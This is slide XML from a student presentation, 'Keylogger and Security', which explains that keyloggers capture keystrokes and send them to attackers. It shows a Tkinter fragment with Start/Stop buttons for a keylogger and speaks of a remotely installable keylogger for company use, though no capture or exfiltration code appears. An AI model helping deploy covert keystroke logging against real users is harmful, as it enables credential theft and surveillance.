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7" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="263" r:id="rId9"/>
    <p:sldId id="266" r:id="rId10"/>
    <p:sldId id="267" r:id="rId11"/>
    <p:sldId id="268" r:id="rId12"/>
    <p:sldId id="269" r:id="rId13"/>
    <p:sldId id="264" r:id="rId14"/>
    <p:sldId id="265"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E3616BE-94AF-46B6-9D8C-4D7126138FD7}">
          <p14:sldIdLst/>
        </p14:section>
        <p14:section name="Default Section" id="{060D5A08-38FC-4BF0-976E-7955D49ED71D}">
          <p14:sldIdLst>
            <p14:sldId id="257"/>
            <p14:sldId id="258"/>
            <p14:sldId id="259"/>
            <p14:sldId id="260"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Untitled Section" id="{9B03104C-3765-4B6F-AE66-86FEB12F7695}">
          <p14:sldIdLst>
            <p14:sldId id="261"/>
            <p14:sldId id="262"/>
            <p14:sldId id="263"/>
            <p14:sldId id="266"/>
            <p14:sldId id="267"/>
            <p14:sldId id="268"/>
            <p14:sldId id="269"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Untitled Section" id="{8829FB4C-303B-4282-BB9E-17652C744D8C}">
          <p14:sldIdLst>
            <p14:sldId id="264"/>
            <p14:sldId id="265"/>
            <p14:sldId id="27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564770-070C-4253-B0CC-2D0C028069F8}"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84A04E-FEFC-45EF-AAF6-84548B8267CC}"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C59E6E6-AA52-4FC6-9E02-7DEAFB8870EB}"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8AA462D-BA06-402B-9467-44E24227A49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9B89BA-4C73-4036-A42E-5FF63E0C6B2F}"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E8AA462D-BA06-402B-9467-44E24227A49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9B89BA-4C73-4036-A42E-5FF63E0C6B2F}"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E8AA462D-BA06-402B-9467-44E24227A49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9B89BA-4C73-4036-A42E-5FF63E0C6B2F}"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E8AA462D-BA06-402B-9467-44E24227A49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9B89BA-4C73-4036-A42E-5FF63E0C6B2F}"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8AA462D-BA06-402B-9467-44E24227A49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9B89BA-4C73-4036-A42E-5FF63E0C6B2F}"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E8AA462D-BA06-402B-9467-44E24227A49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9B89BA-4C73-4036-A42E-5FF63E0C6B2F}"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E8AA462D-BA06-402B-9467-44E24227A49A}"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19B89BA-4C73-4036-A42E-5FF63E0C6B2F}"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8AA462D-BA06-402B-9467-44E24227A49A}"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19B89BA-4C73-4036-A42E-5FF63E0C6B2F}"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AA462D-BA06-402B-9467-44E24227A49A}"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19B89BA-4C73-4036-A42E-5FF63E0C6B2F}"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8AA462D-BA06-402B-9467-44E24227A49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9B89BA-4C73-4036-A42E-5FF63E0C6B2F}"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8AA462D-BA06-402B-9467-44E24227A49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9B89BA-4C73-4036-A42E-5FF63E0C6B2F}"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AA462D-BA06-402B-9467-44E24227A49A}"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9B89BA-4C73-4036-A42E-5FF63E0C6B2F}"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11.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nchor="t"/>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2209800" y="2024971"/>
            <a:ext cx="10010019" cy="509114"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="3213735">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="15" dirty="0"/>
              <a:t>BOGGAVARAPU.VENKATA SAI</a:t>
            </a:r>
            <a:endParaRPr spc="15" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6484620" y="2821622"/>
            <a:ext cx="2049780" cy="382156"/>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panose="020B0603020202020204"/>
                <a:cs typeface="Trebuchet MS" panose="020B0603020202020204"/>
              </a:rPr>
              <a:t>Final</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-165" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D936B"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204"/>
                <a:cs typeface="Trebuchet MS" panose="020B0603020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D936B"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204"/>
                <a:cs typeface="Trebuchet MS" panose="020B0603020202020204"/>
              </a:rPr>
              <a:t>Project</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204"/>
              <a:cs typeface="Trebuchet MS" panose="020B0603020202020204"/>
            </a:endParaRPr>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90600"/>
            <a:ext cx="10681335" cy="3077766"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>start_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t> = Button(root, text="Start", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>start_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(side=LEFT)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>stop_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t> = Button(root, text="Stop", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>, state='disabled')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>stop_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(side=RIGHT)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>root.geometry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>("250x250")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>root.mainloop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3505200" y="3657600"/>
            <a:ext cx="2392887" cy="262912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7391400" y="149139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55332" y="385444"/>
            <a:ext cx="10681335" cy="6937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40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9" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2553315" y="2758767"/>
            <a:ext cx="6334126" cy="2462213"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>secuetre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t> accounts in a system or computer.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>In this solution the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>muose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t> and keyboard control and it store in a txt file what we type on keyboard.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3200" b="1"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panose="020B0603020202020204"/>
                <a:cs typeface="Trebuchet MS" panose="020B0603020202020204"/>
              </a:rPr>
              <a:t>Teams</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204"/>
                <a:cs typeface="Trebuchet MS" panose="020B0603020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="10" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204"/>
                <a:cs typeface="Trebuchet MS" panose="020B0603020202020204"/>
              </a:rPr>
              <a:t>cam</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-105" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204"/>
                <a:cs typeface="Trebuchet MS" panose="020B0603020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204"/>
                <a:cs typeface="Trebuchet MS" panose="020B0603020202020204"/>
              </a:rPr>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="10" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204"/>
                <a:cs typeface="Trebuchet MS" panose="020B0603020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204"/>
                <a:cs typeface="Trebuchet MS" panose="020B0603020202020204"/>
              </a:rPr>
              <a:t>wireframes</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204"/>
              <a:cs typeface="Trebuchet MS" panose="020B0603020202020204"/>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7" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="501097" y="2496129"/>
            <a:ext cx="6100916" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>keylogger lets the company record and process your keystrokes, so it can track anything you type on your keyboard.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>By these wireframes we can protect our company and it is useful to find information.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>To create a wireframes we can have software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1"/>
              <a:t>to create it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="20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2" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="2439687"/>
            <a:ext cx="6396191" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0"/>
              <a:t>Keyloggers are a potent threat to both individuals and enterprises, with the potential to cause significant harm if left undetected. Understanding the nature of keyloggers, their methods of infiltration, and the dangers they pose is crucial for maintaining a secure digital environment.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="24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GITHUB REPOSITORY LINK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="3244850"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>https://github.com/Venkatasa-3173/APSSDC-CS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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911586" y="896070"/>
            <a:ext cx="5800851" cy="51816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 name="Subtitle 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889193" y="3039171"/>
            <a:ext cx="8864407" cy="2780604"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>KEYLOGGER AND SECURITY</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="600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3" name="Text Placeholder 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1704975" y="1524253"/>
            <a:ext cx="7774078" cy="3970318"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>A keylogger is a key stroker/keyboard capturing is a form of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> or hardware that keeps track of and records your keystrokes as you type.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>It takes the information and sends it to a hacker using a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>command-and-control (C&amp;C) server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>The hacker then analyzes the keystrokes to locate usernames and passwords and uses them to hack into otherwise secure systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11353418" y="6473337"/>
            <a:ext cx="151129" cy="191770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1100" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="2D936B"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Trebuchet MS" panose="020B06030202020202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5"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr lang="en-IN" spc="10" smtClean="0"/>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8686800" y="143446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1" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="786785" y="1905000"/>
            <a:ext cx="6940869" cy="2215991"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>hacker then analyzes the keystrokes to locate usernames and passwords and uses them to hack into otherwise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>secure systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>To tackle this issue we are therefore using a software keylogger that can be remotely ins</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11353418" y="6473337"/>
            <a:ext cx="151129" cy="191770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1100" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="2D936B"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Trebuchet MS" panose="020B06030202020202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5"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr lang="en-IN" spc="10" smtClean="0"/>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4174" y="4452192"/>
            <a:ext cx="3552826" cy="156760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7010400" y="99694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1" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717960" y="1589285"/>
            <a:ext cx="8858250" cy="3693319"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
